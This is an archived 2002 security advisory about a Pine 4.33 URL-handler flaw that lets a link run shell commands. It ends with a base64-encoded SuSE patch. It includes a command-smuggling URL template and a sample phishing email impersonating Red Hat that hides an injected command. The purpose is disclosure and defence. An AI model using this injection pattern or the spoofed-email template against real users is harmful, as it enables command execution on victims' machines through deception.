TUCoPS :: Unix :: General
:: unix4973.htm
Pine URL handler allows embedded commands
7th Jan 2002 [SBWID-4973]
COMMAND
Pine URL handler allows embedded commands
SYSTEMS AFFECTED
Pine 4.33 (at least)
PROBLEM
Zen-parse posted :
In Pine, if a user selects a URL for the form
http://address/\'&/some/program${IFS}with${IFS}arguments&\'
and URL handlers are installed, they will end up with the browser open
on
http://address/
and
/some/program with arguments
will get executed.
If you are reading your email as root these these commands will execute
as root. (Create an alias for root to a non-privileged user instead of
reading mail as root.)
If you are reading your email as a non-privileged user, the impact is
somewhat lower, although local exploits could be run on the computer,
or Outlook style email viruses could be executed. If you don\'t view
links given to you in Pine, the impact from this problem is
non-existant. It is possible to obfuscate the URL by putting it in an
HTML message such as the following.
----Begin html email----
From: Redhat Network Security <rhnsecurity@redhat.com>
To: undisclosed list <.@.>
Subject: Urgent update required to PINE
Message-ID: <Pine.LNX.4.33.0110221213510.9618-200000@clarity.local>
MIME-Version: 1.0
Content-Type: TEXT/html
Content-ID: <Pine.LNX.4.33.0110221214120.9618@clarity.local>
Content-Length: 389
Lines: 12
<HTML>
<BODY>
Urgent update:<p>
PINE allows execution of arbitrary commands.<p>
<a href=\"http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/hole-in-pine-url-handler/\';touch${IFS}/tmp/zen.was.here;\'/\">
http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/hole-in-pine-url-handler/</a>
<p>
This link contains PINE update information. <p>
You are advised to perform this immediately. <p>
The link also contains other urgent update information. <p>
</BODY>
</HTML>
----End html email----
Which would appear something like
----Begin view of email----
Date: 2001年10月22日 13:34:40 +1300
From: Redhat Network Security <rhnsecurity@redhat.com>
To: undisclosed list <.@.>
Subject: Urgent update required to PINE
Urgent update:
PINE allows execution of arbitrary commands.
http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/ho
e-in-pine-url-handler/
This link contains PINE update information.
You are advised to perform this immediately.
The link also contains other urgent update information.
----End view of email----
When this link is selected to follow, Pine changes the status/menu
lines to read:
View selected URL \"http://updates.redhat.com/update_information/urgent/r...\" ?
Y [Yes] U editURL
N No A editApp
Which appears to match the url in the email. This probably makes
detection of this kind of exploit attempt harder.
-------------------------------------------------------------------------
The preceding information is confidential and may not be redistributed
without explicit permission. Legal action may be taken to enforce this.
If this message was posted by zen-parse@gmx.net to a public forum it may
be redistributed as long as these conditions remain attached. If you are
mum or dad, this probably doesn\'t apply to you.
SOLUTION
Patch ripped from SuSE pine package by Olaf Kirch :
--168455424-1305060506-1010408465=:22932
Content-Type: TEXT/PLAIN; charset=US-ASCII; name=\"pine-4.33-security.patch\"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.43.0201071401050.22932@dent.suse.de>
Content-Description:
Content-Disposition: attachment; filename=\"pine-4.33-security.patch\"
LS0tIHBpbmUvbWFpbHZpZXcuYy5vcmlnCVRodSBPY3QgMTIgMjE6MzM6MzIg
MjAwMA0KKysrIHBpbmUvbWFpbHZpZXcuYwlGcmkgT2N0IDI3IDEwOjA0OjU4
IDIwMDANCkBAIC0zNzM4LDEyNCArMzczOCw0NiBAQA0KICNkZWZpbmUJVVJM
X01BWF9MQVVOQ0gJKDIgKiBNQUlMVE1QTEVOKQ0KIA0KICAgICBpZihoYW5k
bGUtPmgudXJsLnRvb2wpew0KLQljaGFyCSp0b29scCwgKmNtZHAsICpwLCAq
cSwgY21kW1VSTF9NQVhfTEFVTkNIICsgMV07DQotCWNoYXIgICAgKmxlZnRf
ZG91YmxlX3F1b3RlLCAqcmlnaHRfZG91YmxlX3F1b3RlOw0KLQlpbnQJIG1v
ZGUsIGxlbiwgaGxlbiwgcXVvdGFibGUgPSAwLCBjb3BpZWQgPSAwLCBkb3Vi
bGVfcXVvdGVkID0gMDsNCisJY2hhcgkqdG9vbHAsICpjbWRwLCAqZW5kcCwg
Y21kW1VSTF9NQVhfTEFVTkNIICsgMV07DQorCWludAkgbW9kZSwgbGVuLCBj
b3BpZWQgPSAwOw0KIAlQSVBFX1MgKnN5c3BpcGU7DQogDQogCWlmKChsZW4g
PSBzdHJsZW4odG9vbHAgPSBoYW5kbGUtPmgudXJsLnRvb2wpKSA+IFVSTF9N
QVhfTEFVTkNIKQ0KIAkgIHJldHVybih1cmxfbGF1bmNoX3Rvb19sb25nKHJ2
KSk7DQogCSAgDQotCWhsZW4JID0gc3RybGVuKGhhbmRsZS0+aC51cmwucGF0
aCk7DQotDQogCS8qDQotCSAqIEZpZ3VyZSBvdXQgaWYgd2UgbmVlZCB0byBx
dW90ZSB0aGUgVVJMLiBJZiB0aGVyZSBhcmUgc2hlbGwNCi0JICogbWV0YWNo
YXJhY3RlcnMgaW4gaXQgd2Ugd2FudCB0byBxdW90ZSBpdCwgYmVjYXVzZSB3
ZSBkb24ndCB3YW50DQotCSAqIHRoZSBzaGVsbCB0byBpbnRlcnByZXQgdGhl
bS4gSG93ZXZlciwgaWYgdGhlIHVzZXIgaGFzIGFscmVhZHkNCi0JICogcXVv
dGVkIHRoZSBVUkwgaW4gdGhlIGNvbW1hbmQgZGVmaW5pdGlvbiB3ZSBkb24n
dCB3YW50IHRvIHF1b3RlDQotCSAqIGFnYWluLiBTbywgd2UgdHJ5IHRvIHNl
ZSBpZiB0aGVyZSBhcmUgYSBwYWlyIG9mIHVuZXNjYXBlZA0KLQkgKiBxdW90
ZXMgc3Vycm91bmRpbmcgX1VSTF8gaW4gdGhlIGNtZC4NCi0JICogSWYgd2Ug
cXVvdGUgd2hlbiB3ZSBzaG91bGRuJ3QgaGF2ZSwgaXQnbGwgY2F1c2UgaXQg
bm90IHRvIHdvcmsuDQotCSAqIElmIHdlIGRvbid0IHF1b3RlIHdoZW4gd2Ug
c2hvdWxkIGhhdmUsIGl0J3MgYSBwb3NzaWJsZSBzZWN1cml0eQ0KLQkgKiBw
cm9ibGVtIChhbmQgaXQgc3RpbGwgd29uJ3Qgd29yaykuDQotCSAqDQotCSAq
IEluIGJhc2ggYW5kIGtzaCAkKCBleGVjdXRlcyBhIGNvbW1hbmQsIHNvIHdl
IHVzZSBzaW5nbGUgcXVvdGVzDQotCSAqIGluc3RlYWQgb2YgZG91YmxlIHF1
b3RlcyB0byBkbyBvdXIgcXVvdGluZy4gSWYgY29uZmlndXJlZCBjb21tYW5k
DQotCSAqIGlzIGRvdWJsZS1xdW90ZWQgd2UgY2hhbmdlIHRoYXQgdG8gc2lu
Z2xlIHF1b3Rlcy4NCisJICogUmF0aGVyIHRoYW4gdHJ5aW5nIHRvIGJlIHNt
YXJ0IGFib3V0IHF1b3RpbmcgYW5kDQorCSAqIG1ldGEtY2hhcmFjdGVycywg
anVzdCBzdHVmZiB0aGUgVVJMIGludG8gYW4gZW52aXJvbm1lbnQNCisJICog
dmFyaWFibGUgYW5kIG1ha2UgdGhlIGhhbmRsZXIgdXNlIGl0Lg0KIAkgKi8N
Ci0jaWZkZWYJX1dJTkRPV1MNCi0JaWYoKnRvb2xwID09ICcqJyB8fCAoKnRv
b2xwID09ICdcIicgJiYgKih0b29scCsxKSA9PSAnKicpKQ0KLQkgIHF1b3Rh
YmxlID0gMDsJCS8qIG5ldmVyIHF1b3RlICovDQotCWVsc2UNCi0jZW5kaWYN
Ci0JaWYoc3RycGJyayhoYW5kbGUtPmgudXJsLnBhdGgsICImKjs8Pj9bfH4k
IikgIT0gTlVMTCl7ICAvKiBzcGVjaWFscz8gKi8NCi0JICAgIGlmKChwID0g
c3Ryc3RyKHRvb2xwLCAiX1VSTF8iKSkgIT0gTlVMTCl7ICAvKiBleHBsaWNp
dCBhcmc/ICovDQotCQlpbnQgaW5fcXVvdGUgPSAwOw0KLQ0KLQkJLyogc2Vl
IHdoZXRoZXIgb3Igbm90IGl0IGlzIGFscmVhZHkgcXVvdGVkICovDQotDQot
CSAgICAgICAgcXVvdGFibGUgPSAxOw0KLQ0KLQkJZm9yKHEgPSB0b29scDsg
cSA8IHA7IHErKykNCi0JCSAgaWYoKnEgPT0gJ1wnJyAmJiAocSA9PSB0b29s
cCB8fCBxWy0xXSAhPSAnXFwnKSkNCi0JCSAgICBpbl9xdW90ZSA9IDEgLSBp
bl9xdW90ZTsNCi0JCQ0KLQkJaWYoaW5fcXVvdGUpew0KLQkJICAgIGZvcihx
ID0gcCs1OyAqcTsgcSsrKQ0KLQkJICAgICAgaWYoKnEgPT0gJ1wnJyAmJiBx
Wy0xXSAhPSAnXFwnKXsNCi0JCQkgIC8qIGFscmVhZHkgc2luZ2xlIHF1b3Rl
ZCwgbGVhdmUgaXQgYWxvbmUgKi8NCi0JCQkgIHF1b3RhYmxlID0gMDsNCi0J
CQkgIGJyZWFrOw0KLQkJICAgICAgfQ0KLQkJfQ0KLQ0KLQkJaWYocXVvdGFi
bGUpew0KLQkJICAgIGluX3F1b3RlID0gMDsNCi0JCSAgICBmb3IocSA9IHRv
b2xwOyBxIDwgcDsgcSsrKQ0KLQkJICAgICAgaWYoKnEgPT0gJ1wiJyAmJiAo
cSA9PSB0b29scCB8fCBxWy0xXSAhPSAnXFwnKSl7DQotCQkJICBpbl9xdW90
ZSA9IDEgLSBpbl9xdW90ZTsNCi0JCQkgIGlmKGluX3F1b3RlKQ0KLQkJCSAg
ICBsZWZ0X2RvdWJsZV9xdW90ZSA9IHE7DQotCQkgICAgICB9DQotCQkgICAg
DQotCQkgICAgaWYoaW5fcXVvdGUpew0KLQkJCWZvcihxID0gcCs1OyAqcTsg
cSsrKQ0KLQkJCSAgaWYoKnEgPT0gJ1wiJyAmJiBxWy0xXSAhPSAnXFwnKXsN
Ci0JCQkgICAgICAvKiB3ZSdsbCByZXBsYWNlIGRvdWJsZSBxdW90ZXMgd2l0
aCBzaW5nbGVzICovDQotCQkJICAgICAgZG91YmxlX3F1b3RlZCA9IDE7DQot
CQkJICAgICAgcmlnaHRfZG91YmxlX3F1b3RlID0gcTsNCi0JCQkgICAgICBi
cmVhazsNCi0JCQkgIH0NCi0JCSAgICB9DQotCQl9DQotCSAgICB9DQotCSAg
ICBlbHNlDQotCSAgICAgIHF1b3RhYmxlID0gMTsNCi0JfQ0KLQllbHNlDQot
CSAgcXVvdGFibGUgPSAwOw0KKwlzZXRlbnYoIlVSTCIsIGhhbmRsZS0+aC51
cmwucGF0aCwgMSk7DQorI2RlZmluZSBfVVJMX0VYUEFOU0lPTgkiXCIkVVJM
XCIiDQogDQogCS8qIEJ1aWxkIHRoZSBjb21tYW5kICovDQogCWNtZHAgPSBj
bWQ7DQotCXdoaWxlKDEpDQotCSAgaWYoKCEqdG9vbHAgJiYgIWNvcGllZCkN
Ci0JICAgICB8fCAoKnRvb2xwID09ICdfJyAmJiAhc3RybmNtcCh0b29scCAr
IDEsICJVUkxfIiwgNCkpKXsNCisJZW5kcCA9IGNtZCArIHNpemVvZihjbWQp
IC0gMTsNCisJZG8gew0KKwkgIGlmIChjbWRwICsgMSA+IGVuZHApDQorCSAg
ICAgIHJldHVybih1cmxfbGF1bmNoX3Rvb19sb25nKHJ2KSk7DQogDQorCSAg
aWYgKCEqdG9vbHAgJiYgIWNvcGllZCkgew0KIAkgICAgICAvKiBpbXBsaWNp
dCBfVVJMXyBhdCBlbmQgKi8NCi0JICAgICAgaWYoISp0b29scCl7DQotCQkg
ICpjbWRwKysgPSAnICc7DQotCQkgIGxlbisrOw0KLQkgICAgICB9DQotDQot
CSAgICAgIC8qIGFkZCBzaW5nbGUgcXVvdGVzICovDQotCSAgICAgIGlmKHF1
b3RhYmxlICYmICFkb3VibGVfcXVvdGVkKXsNCi0JCSAgKmNtZHArKyA9ICdc
Jyc7DQotCQkgIGxlbiArPSAyOw0KLQkgICAgICB9DQorCSAgICAgICplbmRw
KysgPSAnICc7DQorCSAgICAgIHRvb2xwID0gIl9VUkxfIjsNCisJICB9DQor
DQorCSAgaWYgKHN0cm5jbXAodG9vbHAsICJfVVJMXyIsIDUpICE9IDApIHsN
CisJICAgICAgKmNtZHArKyA9ICp0b29scCsrOw0KKwkgIH0gZWxzZSB7DQor
CSAgICAgIHRvb2xwICs9IDU7IC8qIGxlbmd0aCBvZiBfVVJMXyAqLw0KIA0K
LQkgICAgICBpZigobGVuICs9IGhsZW4pID4gVVJMX01BWF9MQVVOQ0gpDQor
CSAgICAgIGlmIChjbWRwICsgc2l6ZW9mKF9VUkxfRVhQQU5TSU9OKSAtIDEg
PiBlbmRwKQ0KIAkJcmV0dXJuKHVybF9sYXVuY2hfdG9vX2xvbmcocnYpKTsN
CiANCisJICAgICAgc3N0cmNweSgmY21kcCwgX1VSTF9FWFBBTlNJT04pOw0K
IAkgICAgICBjb3BpZWQgPSAxOw0KLQkgICAgICBzc3RyY3B5KCZjbWRwLCBo
YW5kbGUtPmgudXJsLnBhdGgpOw0KLQkgICAgICBpZihxdW90YWJsZSAmJiAh
ZG91YmxlX3F1b3RlZCl7DQotCQkgICpjbWRwKysgPSAnXCcnOw0KLQkJICAq
Y21kcCA9ICdcMCc7DQotCSAgICAgIH0NCi0NCi0JICAgICAgaWYoKnRvb2xw
KQ0KLQkJdG9vbHAgKz0gNTsJCS8qIGxlbmd0aCBvZiAiX1VSTF8iICovDQot
CSAgfQ0KLQkgIGVsc2V7DQotCSAgICAgIC8qIHJlcGxhY2UgZG91YmxlIHF1
b3RlcyB3aXRoIHNpbmdsZSBxdW90ZXMgKi8NCi0JICAgICAgaWYoZG91Ymxl
X3F1b3RlZCAmJg0KLQkJICh0b29scCA9PSBsZWZ0X2RvdWJsZV9xdW90ZSB8
fCB0b29scCA9PSByaWdodF9kb3VibGVfcXVvdGUpKXsNCi0JCSAgKmNtZHAr
KyA9ICdcJyc7DQotCQkgIHRvb2xwKys7DQotCSAgICAgIH0NCi0JICAgICAg
ZWxzZSBpZighKCpjbWRwKysgPSAqdG9vbHArKykpDQotCQlicmVhazsNCiAJ
ICB9DQorCX0gd2hpbGUgKCp0b29scCk7DQogCQ0KIAltb2RlID0gUElQRV9S
RVNFVCB8IFBJUEVfVVNFUiA7DQogCWlmKHN5c3BpcGUgPSBvcGVuX3N5c3Rl
bV9waXBlKGNtZCwgTlVMTCwgTlVMTCwgbW9kZSwgMCkpew0K
--168455424-1305060506-1010408465=:22932--